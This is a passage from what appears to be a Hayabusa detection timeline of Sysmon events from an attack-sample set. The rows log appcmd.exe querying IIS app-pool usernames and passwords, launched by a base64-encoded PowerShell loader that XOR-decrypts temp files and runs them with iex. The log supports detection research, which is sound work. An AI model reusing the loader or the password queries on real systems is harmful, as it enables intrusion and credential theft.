kAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQA